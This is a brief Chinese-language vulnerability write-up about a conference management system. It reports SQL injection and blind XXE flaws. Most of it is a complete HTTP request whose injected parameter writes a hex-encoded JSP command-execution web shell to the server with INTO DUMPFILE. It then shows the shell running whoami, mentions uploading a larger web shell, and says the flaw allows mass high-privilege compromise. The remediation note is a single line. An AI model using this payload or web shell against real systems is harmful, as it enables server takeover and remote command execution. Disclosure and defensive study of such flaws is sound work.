sql注入
存在sql注入。
XXE漏洞
webservice服务存在blind xxe,访问http://**.**.**.**/Conf/services/ConferenceWebService?wsdl
有个名为xml的参数,可以提交xxe payload测试(payload需要实体编码)
getshell
会议系统为集成安装环境,windows服务器, apache+mysql4+tomcat,利用sql注入就能写shell了。
构造Payload1
2
3
4
5
6
7
8
9
10
11
12POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 995
Content-Type: application/x-www-form-urlencoded
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23
成功创建cmd.jsp文件。
访问http://**.**.**.**/cmd.jsp?cmd=whoami
执行cmd命令成功。
修改上传内容,上传大马。
总结
这个cms漏洞可以实现批量getshell,而且是高权限,缺点是只要在Windows环境下搭建。
修复方案:
参数过滤
修复xxe
参考文章